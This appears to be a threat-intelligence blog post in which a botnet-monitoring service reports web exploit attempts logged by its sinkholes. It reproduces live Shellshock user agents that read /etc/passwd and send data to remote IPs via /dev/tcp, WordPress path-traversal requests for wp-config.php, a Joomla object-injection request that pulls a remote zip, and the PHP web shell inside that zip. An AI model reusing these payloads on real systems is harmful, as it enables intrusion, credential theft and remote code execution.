Web attacks caught by Virus Tracker

With having the largest botnet monitoring system in the world (with more than 8.000 domains) we see all kinds of bots connecting to our sinkholes – including robots that try to find and exploit certain vulnerabilities like shellshock, some admin panels or that try to find SQLIs.

Finding exploit attempts in our dataset

Finding such entries is fairly easy – we can simply download all APT infection data for this year and then have a full-text search for anything containing “{“.

Request paths containing the exploit:
/search/?query=${eval(base64_decode(%27ZWNobycycTRtbmozaGc2bW5nZmgnOw==%27));}

User Agents being evil:
() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd;
() { test;};echo Content-type: text/plain; echo; echo; /bin/cat /etc/passwd
() { :;}; /bin/bash -c echo [domain]/cgi-bin/php5 > /dev/tcp/213.233.161.42/23; echo [domain]/cgi-bin/php5 > /dev/udp/213.233.161.42/80
() { :;}; /bin/bash -c echo [domain]/cgi-bin/test-cgi > /dev/tcp/23.227.199.185/80; echo [domain]/cgi-bin/test-cgi > /dev/udp/23.227.199.185/80
() { :;}; /bin/bash -c echo [domain]/cgi-bin/php-cgi > /dev/tcp/213.233.161.42/23; echo [domain]/cgi-bin/php-cgi > /dev/udp/213.233.161.42/80
() { :;}; /bin/bash -c echo [domain]/cgi-bin/php-cgi > /dev/tcp/213.233.161.42/23; echo [domain]/cgi-bin/php-cgi > /dev/udp/213.233.161.42/80
() { :;}; /bin/bash -c echo [domain]/ > /dev/tcp/213.233.161.42/23; echo [domain]/ > /dev/udp/213.233.161.42/80
() { :;}; /bin/bash -c echo [domain]/phppath/cgi_wrapper?  > /dev/tcp/67.228.177.7/23; /bin/uname -a > /dev/tcp/67.228.177.7/23; echo [domain]/phppath/cgi_wrapper? > /dev/udp/67.228.177.7/80

Check out the first one. We can use the Virus Tracker tools to decode this base64 “ZWNobycycTRtbmozaGc2bW5nZmgnOw==” and get as a result “echo’2q4mnj3hg6mngfh’;”. It is expected that the evil tool doing the request with this shellshock poisoned user agent expects this string “2q4mnj3hg6mngfh” in the response to verify whether the server is vulnerable or not.

In the other attempts you can see that it tries to pipe some information to remote TCP connections. We have plenty of those user agents and just pasted a few above.

Where are those evil robots scanning for vulnerable servers coming from?

Due to the nature of TCP we see all IPs of the robots doing the scanning. For the base64 one from above we have seen the exact same requests coming from these locations:

2015-01-13 22:58:28	62.212.76.84	LeaseWeb	Netherlands
2015-01-13 23:00:52	85.128.139.6	NetArt webhosting servers	Poland
2015-01-13 22:20:24	184.168.46.87	GoDaddy.com LLC	United States
2015-01-13 22:22:15	184.168.152.75	GoDaddy.com LLC	United States
2015-01-13 23:07:06	97.74.24.214	GoDaddy.com LLC	United States
2015-01-14 07:46:58	198.57.247.223	Unified Layer	United States
2015-01-13 23:02:27	31.41.43.1	Relink Ltd.	Russian Federation
2015-01-13 23:05:38	164.138.200.148	Centro Canario de Tratamiento de Informacion SLU	Spain

You can check it out yourself here http://virustracker.net/91.109.2.132, have a look at the user agents there!

And here the list of the most recent attempts from today:

2015-03-05 20:12:52	74.208.199.94	1&1 Internet	United States	/cgi-sys/php4	() { :;}; /bin/bash -c echo IMGGOOGLE.COM/cgi-sys/php4  > /dev/tcp/67.228.177.7/23; /bin/uname -a > /dev/tcp/67.228.177.7/23; echo IMGGOOGLE.COM/cgi-sys/php4 > /dev/udp/67.228.177.7/80
2015-03-05 20:51:53	74.208.199.94	1&1 Internet	United States	/cgi-sys/php4	() { :;}; /bin/bash -c echo INDIA-VIDEOER.COM/cgi-sys/php4  > /dev/tcp/67.228.177.7/23; /bin/uname -a > /dev/tcp/67.228.177.7/23; echo INDIA-VIDEOER.COM/cgi-sys/php4 > /dev/udp/67.228.177.7/80
2015-03-05 21:24:08	74.208.199.94	1&1 Internet	United States	/cgi-sys/php4	() { :;}; /bin/bash -c echo INFO-WEEK.COM/cgi-sys/php4  > /dev/tcp/67.228.177.7/23; /bin/uname -a > /dev/tcp/67.228.177.7/23; echo INFO-WEEK.COM/cgi-sys/php4 > /dev/udp/67.228.177.7/80
2015-03-06 02:13:12	74.208.199.94	1&1 Internet	United States	/cgi-sys/php4	() { :;}; /bin/bash -c echo JASMINJORDEN.COM/cgi-sys/php4  > /dev/tcp/67.228.177.7/23; /bin/uname -a > /dev/tcp/67.228.177.7/23; echo JASMINJORDEN.COM/cgi-sys/php4 > /dev/udp/67.228.177.7/80

Robots scanning for vulnerable admin panels

Of course we see also plenty and plenty of attempts to find and hack admin panels like:

2015-03-05 23:43:23	78.151.25.8	TalkTalk	United Kingdom	/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
2015-03-05 23:43:25	185.11.227.211	Wave-Max S.r.l.	Italy	/wp-content/themes/infocus/lib/scripts/dl-skin.php
2015-03-05 23:43:36	135.196.125.106	MDNX Enterprise Services Limited	United Kingdom	/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php
2015-03-05 23:43:40	134.255.167.15	Wave-Max S.r.l.	Italy	/wp-content/themes/dejavu/lib/scripts/dl-skin.php
2015-03-06 00:25:36	194.6.233.15	SpecAvtomatika LTD	Ukraine	/administrator/index.php

It might be interesting and possible to take the Virus Tracker dataset and find publicly unknown vulnerabilities that are exploited actively by criminals.

A specifically interesting one which contains additional code encoded is this:

/administrator/components/com_joomlaupdate/restore.php?task=stepRestore&factory=Tzo5OiJBS0ZhY3RvcnkiOjE6e3M6MTg6IgBBS0ZhY3RvcnkAdmFybGlzdCI7YToyOntzOjI3OiJraWNrc3RhcnQuc2VjdXJpdHkucGFzc3dvcmQiO3M6MDoiIjtzOjI2OiJraWNrc3RhcnQuc2V0dXAuc291cmNlZmlsZSI7czo0MDoiaHR0cDovL2RhbGUxdnVlbHRhLmNvbS9tZWRpYS93dDUxMjFuLnppcCI7fX0=

The decoded text (from base64) is:
O:9:"AKFactory":1:{s:18:"AKFactoryvarlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:40:"http://dale1vuelta.com/media/wt5121n.zip";}}

The zip file is still up and contains a PHP file containing only this line:
< ? php eval(stripslashes(@$_POST[(chr(112).chr(49))])); ? >